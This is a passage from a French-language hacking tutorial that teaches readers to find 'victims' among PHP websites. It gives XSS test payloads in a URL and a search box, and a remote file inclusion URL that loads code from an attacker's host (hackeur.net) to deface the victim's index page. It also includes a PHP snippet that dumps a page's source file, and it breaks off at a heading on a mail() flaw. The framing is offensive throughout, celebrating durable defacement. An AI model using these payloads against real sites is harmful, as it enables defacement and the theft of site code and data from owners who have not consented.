Pour vérifier si le Webmaster n'a pas pensé à sécuriser son code, voici comment faire : http://www.victime.net/casimir.php?page=4&titre=<script>alert("C'est du billard !")</script>

Si la page affiche une boite de dialogue avec inscrit "C'est du billard", c'est que c'est du billard :), vous vous êtes trouvé une victime !
Vous n'avez donc plus qu'à remplacer le titre par, par exemple, une fonction include() : include("http://www.hackeur.net/tmor.php") De cette façon, la page tmor.php de votre site (hackeur.net) apparaitra dans la page de la victime, à la place du titre.
Dans un moteur de recherche
Par exemple, un moteur de recherche interne au site www.victime.net propose de rechercher les différents éléments de l'Ile aux enfants.
Pour tester la faille, vous entrerez alors ce mot clé :
<script>alert("C'est du billard")</script>

Si la page de résultat affiche une boîte de dialogue avec inscrit "C'est du billard", c'est que c'est Ok !

Imaginons maintenant que vous détourniez ce script : http://www.victime.net/index.php?fichier=http://www.hackeur.net/tmor.php La page tmor.php contenant un code ordonnant d'écrire par exemple "Fuck you" en énorme sur la page index.php.
Le pirate a donc réussit à faire exécuter le code contenu dans la page tmor.php de son propre site dans le site www.victime.net.
Ce code ordonnant de réécrire la page index.php du site, affiche ce qu'il veut sur la page index de la victime. Et cela durablement, jusqu'à ce que le webmaster s'en rende compte.
On dit alors qu'il a déffacé la page.
A partir de là, maintes possibilités sont à porté de main, comme par exemple l'affichage de la page php elle-même.
Si tmor.php contenait cela, ce serait possible :
<?php
$inF = fopen($file, "r");
$j="";
while (!feof($inF)) {
$j=$j.fgets($inF, 4096)."<br> ";
}
$j='<font color="#000">'.$j.'</font>'; echo $j; fclose($inF); ?>
La faille mail()
La fonction mail() de PHP